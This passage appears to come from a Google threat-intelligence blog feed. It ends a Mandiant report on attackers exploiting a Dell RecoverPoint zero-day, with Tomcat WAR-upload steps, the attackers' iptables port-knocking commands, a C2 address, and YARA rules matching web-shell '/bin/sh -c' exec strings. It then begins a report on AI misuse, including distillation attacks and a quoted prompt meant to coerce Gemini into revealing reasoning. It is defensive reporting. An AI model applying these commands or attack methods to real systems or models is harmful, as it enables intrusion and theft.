credentials, a threat actor could authenticate to the Dell RecoverPoint Tomcat Manager, upload a malicious WAR file using the </span><code style="vertical-align: baseline;">/manager/text/deploy</code><span style="vertical-align: baseline;"> endpoint, and then execute commands as </span><code style="vertical-align: baseline;">root</code><span style="vertical-align: baseline;"> on the appliance.</span></p> <p><span style="vertical-align: baseline;">The earliest identified exploitation activity of this vulnerability occurred in mid-2024.</span></p> <h3><span style="vertical-align: baseline;">Newly Observed VMware Activity</span></h3> <p><span style="vertical-align: baseline;">During the course of the recent investigations, Mandiant observed continued compromise of VMware virtual infrastructure by the threat actor as previously reported by </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/brickstorm-espionage-campaign"><span style="text-decoration: underline; vertical-align: baseline;">Mandiant</span></a><span style="vertical-align: baseline;">, </span><a href="https://www.crowdstrike.com/en-us/blog/warp-panda-cloud-threats/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">CrowdStrike</span></a><span style="vertical-align: baseline;">, and </span><a href="https://www.cisa.gov/news-events/analysis-reports/ar25-338a" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">CISA</span></a><span style="vertical-align: baseline;">. Additionally, several new TTPs were discovered that haven’t been previously reported on.</span></p> <h4><span style="vertical-align: baseline;">Ghost NICs</span></h4> <p><span style="vertical-align: baseline;">Mandiant discovered the threat actor creating new temporary network ports on existing virtual machines running on an ESXi server. Using these network ports, the threat actor then pivoted to various internal and software-as-a-service (SaaS) infrastructures used by the affected organizations.</span></p> <h4><span style="vertical-align: baseline;">iptables proxying</span></h4> <p><span style="vertical-align: baseline;">While analyzing compromised vCenter appliances, Mandiant recovered several commands from Systemd Journal executed by the threat actor using a deployed <span style="vertical-align: baseline;">SLAYSTYLE</span></span><span style="vertical-align: baseline;"> web shell. These iptable commands were used for Single Packet Authorization and consisted of:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Monitoring incoming traffic on port 443 for a specific HEX string</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Adding the source IP of that traffic to a list and if the IP is on the list and connects to port 10443, the connection is ACCEPTED</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Once the initial approved traffic comes in to port 10443, any subsequent traffic is automatically redirected</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">For the next 300 seconds (five minutes), any traffic to port 443 is silently redirected to port 10443 if the IP is on the approved list</span></p> </li> </ul></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>iptables -I INPUT -i eth0 -p tcp --dport 443 -m string --hex-string &lt;HEX_STRING&gt; iptables -A port_filter -i eth0 -p tcp --dport 10443 --syn -m recent --rcheck --name ipt -j ACCEPT iptables -t nat -N IPT iptables -t nat -A IPT -p tcp -j REDIRECT --to-ports 10443 iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 --syn -m recent --rcheck --name ipt --seconds 300 -j IPT</code></pre></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Remediation</span></h3> <p><span style="vertical-align: baseline;">The following investigative guide can assist defenders in analyzing Dell RecoverPoint </span><span style="vertical-align: baseline;">for Virtual Machines</span><span style="vertical-align: baseline;">. </span></p> <h4><span style="vertical-align: baseline;">Forensic Analysis of Dell RecoverPoint Disk Image</span></h4> <p><span style="vertical-align: baseline;">The following artifacts are high-value sources of evidence for incident responders conducting full disk image analysis of Dell RecoverPoint </span><span style="vertical-align: baseline;">for Virtual Machines</span><span style="vertical-align: baseline;">.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Web logs for Tomcat Manager are stored in </span><code style="vertical-align: baseline;">/home/kos/auditlog/fapi_cl_audit_log.log</code><span style="vertical-align: baseline;">. Check log file for any instances of requests to </span><code style="vertical-align: baseline;">/manager</code><span style="vertical-align: baseline;">. Any instances of those requests should be considered suspicious</span></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Any requests for </span><code style="vertical-align: baseline;">PUT /manager/text/deploy?path=/&lt;MAL_PATH&gt;&amp;update=true</code><span style="vertical-align: baseline;"> are potentially malicious. </span><code style="vertical-align: baseline;">MAL_PATH</code><span style="vertical-align: baseline;"> will be the path where a potentially malicious WAR file was uploaded</span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Uploaded WAR files are typically stored in </span><code style="vertical-align: baseline;">/var/lib/tomcat9</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Compiled artifacts for uploaded WAR files are located in </span><code style="vertical-align: baseline;">/var/cache/tomcat9/Catalina</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Tomcat application logs located in </span><code style="vertical-align: baseline;">/var/log/tomcat9/</code></p> </li> <ul> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Catalina - investigate any </span><code style="vertical-align: baseline;">org.apache.catalina.startup.HostConfig.deployWAR</code><span style="vertical-align: baseline;"> and </span><code style="vertical-align: baseline;">org.apache.catalina.startup.HostConfig.deployWAR</code><span style="vertical-align: baseline;"> events</span></p> </li> <li aria-level="2" style="list-style-type: circle; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Localhost - Contains additional events associated with WAR deployment and any exceptions generated by malicious WAR and embedded files </span></p> </li> </ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Persistence for <span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">BRICKSTORM</span></span></span></span></span></span><span style="vertical-align: baseline;"> and <span style="vertical-align: baseline;"><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">GRIMBOLT</span></span></span></span><span style="vertical-align: baseline;"> backdoors on Dell RecoverPoint </span><span style="vertical-align: baseline;">for Virtual Machines</span><span style="vertical-align: baseline;"> was established by modifying </span><code style="vertical-align: baseline;">/home/kos/kbox/src/installation/distribution/convert_hosts.sh</code><span style="vertical-align: baseline;"> to include the path to the backdoor</span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Indicators of Compromise (IOCs)</span></h3> <p><span style="vertical-align: baseline;">To assist the wider community in hunting and identifying activity outlined in this blog post, we have included <a href="https://www.virustotal.com/gui/collection/6d9bd98653d426b223007bbafb06ba4b83f83df8de01ee1463a8d60fb2be5107/summary" rel="noopener" target="_blank">IOCs in a free GTI Collection</a> for registered users.</span></p> <h4><span style="vertical-align: baseline;">File Indicators</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Family</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">File Name</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">SHA256</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">GRIMBOLT </span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">support</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">24a11a26a2586f4fba7bfe89df2e21a0809ad85069e442da98c37c4add369a0c</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">GRIMBOLT</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">out_elf_2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">dfb37247d12351ef9708cb6631ce2d7017897503657c6b882a711c0da8a9a591</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SLAYSTYLE</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">default_jsp.java</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">92fb4ad6dee9362d0596fda7bbcfe1ba353f812ea801d1870e37bfc6376e624a</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">BRICKSTORM</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">N/A</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">aa688682d44f0c6b0ed7f30b981a609100107f2d414a3a6e5808671b112d1878</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">BRICKSTORM</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">splisten</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">2388ed7aee0b6b392778e8f9e98871c06499f476c9e7eae6ca0916f827fe65df</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">BRICKSTORM</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">N/A</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">320a0b5d4900697e125cebb5ff03dee7368f8f087db1c1570b0b62f5a986d759</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">BRICKSTORM</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">N/A</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">90b760ed1d0dcb3ef0f2b6d6195c9d852bcb65eca293578982a8c4b64f51b035</code></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">BRICKSTORM</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">N/A</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">45313a6745803a7f57ff35f5397fdf117eaec008a76417e6e2ac8a6280f7d830</code></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Network Indicators</span></h4></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Family</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Indicator</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Type</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">GRIMBOLT</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">wss://149.248.11.71/rest/apisession</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 Endpoint</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">GRIMBOLT</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">149.248.11.71</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">C2 IP</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">YARA Rules</span></h4> <h5><span style="vertical-align: baseline;">G_APT_BackdoorToehold_GRIMBOLT_1</span></h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_APT_BackdoorToehold_GRIMBOLT_1 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $s1 = { 40 00 00 00 41 18 00 00 00 4B 21 20 C2 2C 08 23 02 } $s2 = { B3 C3 BB 41 0D ?? ?? ?? 00 81 02 0C ?? ?? ?? 00 } $s3 = { 39 08 01 49 30 A0 52 30 00 00 00 DB 40 09 00 02 00 80 65 BC 98 } $s4 = { 2F 00 72 00 6F 00 75 00 74 00 65 79 23 E8 03 0E 00 00 00 2F 00 70 00 72 00 6F 00 63 00 2F 00 73 00 65 00 6C 00 66 00 2F 00 65 00 78 00 65 } condition: (uint32(0) == 0x464c457f) //linux and all of ($s*) }</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">G_Hunting_BackdoorToehold_GRIMBOLT_1</span></h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_Hunting_BackdoorToehold_GRIMBOLT_1 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $s1 = "[!] Error : Plexor is nul" ascii wide $s2 = "port must within 0~6553" ascii wide $s3 = "[*] Disposing.." ascii wide $s4 = "[!] Connection error. Kill Pty" ascii wide $s5 = "[!] Unkown message type" ascii wide $s6 = "[!] Bad dat" ascii wide condition: ( (uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x00004550) or uint32(0) == 0x464c457f or uint32(0) == 0xfeedface or uint32(0) == 0xcefaedfe or uint32(0) == 0xfeedfacf or uint32(0) == 0xcffaedfe or uint32(0) == 0xcafebabe or uint32(0) == 0xbebafeca or uint32(0) == 0xcafebabf or uint32(0) == 0xbfbafeca ) and any of them }</code></pre></div> <div class="block-paragraph_advanced"><h5><span style="vertical-align: baseline;">G_APT_BackdoorWebshell_SLAYSTYLE_4</span></h5></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>rule G_APT_BackdoorWebshell_SLAYSTYLE_4 { meta: author = "Google Threat Intelligence Group (GTIG)" strings: $str1 = "&lt;%@page import=\"java.io" ascii wide $str2 = "Base64.getDecoder().decode(c.substring(1)" ascii wide $str3 = "{\"/bin/sh\",\"-c\"" ascii wide $str4 = "Runtime.getRuntime().exec(" ascii wide $str5 = "ByteArrayOutputStream();" ascii wide $str6 = ".printStackTrace(" ascii wide condition: $str1 at 0 and all of them }</code></pre></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Google Security Operations (SecOps)</span></h3> <p><span style="vertical-align: baseline;">Google Security Operations (SecOps) customers have access to these broad category rules and more under the “Mandiant Frontline Threats” and “Mandiant Hunting Rules” rule packs. The activity discussed in the blog post is detected in Google SecOps under the rule names:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Web Archive File Write To Tomcat Directory</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Remote Application Deployment via Tomcat Manager</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Suspicious File Write To Tomcat Cache Directory</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Kbox Distribution Script Modification</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Multiple DNS-over-HTTPS Services Queried</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Unknown Endpoint Generating DNS-over-HTTPS and Web Application Development Services Communication</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Unknown Endpoint Generating Google DNS-over-HTTPS and Cloudflare Hosted IP Communication</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Unknown Endpoint Generating Google DNS-over-HTTPS and Amazon Hosted IP Communication</span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Acknowledgements</span></h3> <p><span style="vertical-align: baseline;">We appreciate Dell for their collaboration against this threat. This analysis would not have been possible without the assistance from across Google Threat Intelligence Group, Mandiant Consulting and FLARE. We would like to specifically thank Jakub Jozwiak and Allan Sepillo from GTIG Research and Discovery (RAD).</span></p></div>Tue, 17 Feb 2026 14:00:00 +0000https://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day/Threat IntelligencearticleGooglehttps://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day/Mandiant Google Threat Intelligence Group https://cloud.google.com/blog/topics/threat-intelligence/distillation-experimentation-integration-ai-adversarial-use/<div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Introduction</span></h3> <p><span style="vertical-align: baseline;">In the final quarter of 2025, Google Threat Intelligence Group (GTIG) observed threat actors increasingly integrating artificial intelligence (AI) to accelerate the attack lifecycle, achieving productivity gains in reconnaissance, social engineering, and malware development. This report serves as an update to our </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/threat-actor-usage-of-ai-tools"><span style="text-decoration: underline; vertical-align: baseline;">November 2025 findings</span></a><span style="vertical-align: baseline;"> regarding the advances in threat actor usage of AI tools.</span></p> <p><span style="vertical-align: baseline;">By identifying these early indicators and offensive proofs of concept, GTIG aims to arm defenders with the intelligence necessary to anticipate the next phase of AI-enabled threats, proactively thwart malicious activity, and continually strengthen both our classifiers and model.</span></p> <h3><span style="vertical-align: baseline;">Executive Summary</span></h3> <p><span style="vertical-align: baseline;">Google DeepMind and GTIG have identified an increase in model extraction attempts or "distillation attacks," a method of intellectual property theft that violates Google's terms of service. Throughout this report we've noted steps we've taken to thwart malicious activity, including Google detecting, disrupting, and mitigating model extraction activity. While we have not observed direct attacks on frontier models or generative AI products from advanced persistent threat (APT) actors, we observed and mitigated frequent model extraction attacks from private sector entities all over the world and researchers seeking to clone proprietary logic. </span></p> <p><span style="vertical-align: baseline;">For government-backed threat actors, large language models (LLMs) have become essential tools for technical research, targeting, and the rapid generation of nuanced phishing lures. This quarterly report highlights how threat actors from the Democratic People's Republic of Korea (DPRK), Iran, the People's Republic of China (PRC), and Russia operationalized AI in late 2025 and improves our understanding of how adversarial misuse of generative AI shows up in campaigns we disrupt in the wild. GTIG has not yet observed APT or information operations (IO) actors achieving breakthrough capabilities that fundamentally alter the threat landscape.</span></p> <p><span style="vertical-align: baseline;">This report specifically examines:</span></p> <ul> <li role="presentation"><strong style="vertical-align: baseline;">Model Extraction Attacks:</strong><span style="vertical-align: baseline;"> "Distillation attacks" are on the rise as a method for intellectual property theft over the last year.</span></li> <li role="presentation"><strong style="vertical-align: baseline;">AI-Augmented Operations:</strong><span style="vertical-align: baseline;"> Real-world case studies demonstrate how groups are streamlining reconnaissance and rapport-building phishing.</span></li> <li role="presentation"><strong style="vertical-align: baseline;">Agentic AI: </strong><span style="vertical-align: baseline;">Threat actors are beginning to show interest in building agentic AI capabilities to support malware and tooling development. </span></li> <li role="presentation"><strong style="vertical-align: baseline;">AI-Integrated Malware:</strong><span style="vertical-align: baseline;"> There are new malware families, such as HONESTCUE, that experiment with using Gemini's application programming interface (API) to generate code that enables download and execution of second-stage malware.</span></li> <li role="presentation"><strong style="vertical-align: baseline;">Underground "Jailbreak" Ecosystem:</strong><span style="vertical-align: baseline;"> Malicious services like Xanthorox are emerging in the underground, claiming to be independent models while actually relying on jailbroken commercial APIs and open-source Model Context Protocol (MCP) servers.</span></li> </ul> <p><span style="vertical-align: baseline;">At Google, we are committed to developing AI boldly and responsibly, which means taking proactive steps to disrupt malicious activity by disabling the projects and accounts associated with bad actors, while continuously improving our models to make them less susceptible to misuse. We also proactively share industry best practices to arm defenders and enable stronger protections across the ecosystem. Throughout this report, we note steps we've taken to thwart malicious activity, including disabling assets and applying intelligence to strengthen both our classifiers and model so it's protected from misuse moving forward. Additional details on how we're protecting and defending Gemini can be found in the white paper "</span><a href="https://deepmind.google/discover/blog/advancing-geminis-security-safeguards/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Advancing Gemini’s Security Safeguards</span></a><span style="vertical-align: baseline;">."</span><span style="vertical-align: baseline;"> </span></p> <h3><span style="vertical-align: baseline;">Direct Model Risks: Disrupting Model Extraction Attacks</span></h3> <p><span style="vertical-align: baseline;">As organizations increasingly integrate LLMs into their core operations, the proprietary logic and specialized training of these models have emerged as high-value targets. Historically, adversaries seeking to steal high-tech capabilities used conventional computer-enabled intrusion operations to compromise organizations and steal data containing trade secrets. For many AI technologies where LLMs are offered as services, this approach is no longer required; actors can use legitimate API access to attempt to "clone" select AI model capabilities.</span></p> <p><span style="vertical-align: baseline;">During 2025, we did not observe any direct attacks on frontier models from tracked APT or information operations (IO) actors. However, we did observe model extraction attacks, also known as distillation attacks, on our AI models, to gain insights into a model's underlying reasoning and chain-of-thought processes. </span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">What Are Model Extraction Attacks?</span> </span></h3> <p><span style="vertical-align: baseline;">Model extraction attacks (MEA) occur when an adversary uses legitimate access to systematically probe a mature machine learning model to extract information used to train a new model. Adversaries engaging in MEA use a technique called knowledge distillation (KD) to take information gleaned from one model and transfer the knowledge to another. For this reason, MEA are frequently referred to as "distillation attacks."</span></p> <p><span style="vertical-align: baseline;">Model extraction and subsequent knowledge distillation enable an attacker to accelerate AI model development quickly and at a significantly lower cost. This activity effectively represents a form of intellectual property (IP) theft.</span></p> <p><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">Knowledge distillation (KD) is a common machine learning technique used to train "student" models from pre-existing "teacher" models. This often involves querying the teacher model for problems in a particular domain, and then performing supervised fine tuning (SFT) on the result or utilizing the result in other model training procedures to produce the student model. There are legitimate uses for distillation, and Google Cloud has </span><a href="https://developers.google.com/machine-learning/crash-course/llm/tuning" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">existing offerings</span></a><span style="vertical-align: baseline;"> to perform distillation. However, distillation from Google's Gemini models without permission is a violation of our </span><a href="https://ai.google.dev/gemini-api/terms#:~:text=You%20may%20not%20use%20the,(e.g.%2C%20parameter%20weights)." rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Terms of Service</span></a><span style="vertical-align: baseline;">, and Google continues to develop techniques to detect and mitigate these attempts.</span></span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/gtig-ai-threat-tracker-feb26-fig1.max-1000x1000.jpg" alt="Illustration of model extraction attacks"> </a> <figcaption class="article-image__caption "><p data-block-key="ojqxz">Figure 1: Illustration of model extraction attacks</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Google DeepMind and GTIG identified and disrupted model extraction attacks, specifically attempts at model stealing and capability extraction emanating from researchers and private sector companies globally.</span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Case Study: Reasoning Trace Coercion</span></h3> <p><span style="vertical-align: baseline;">A common target for attackers is Gemini's exceptional reasoning capability. While internal reasoning traces are typically summarized before being delivered to users, attackers have attempted to coerce the model into outputting full reasoning processes.</span></p> <p><span style="vertical-align: baseline;">One identified attack instructed Gemini that the </span><strong style="vertical-align: baseline;">"... language used in the thinking content must be strictly consistent with the main language of the user input.</strong><span style="vertical-align: baseline;">"</span></p> <p><span style="vertical-align: baseline;">Analysis of this campaign revealed:</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table><colgroup><col/><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Scale</strong><span style="vertical-align: baseline;">: Over </span><strong style="vertical-align: baseline;">100,000</strong><span style="vertical-align: baseline;"> prompts identified.</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Intent</strong><span style="vertical-align: baseline;">: The breadth of 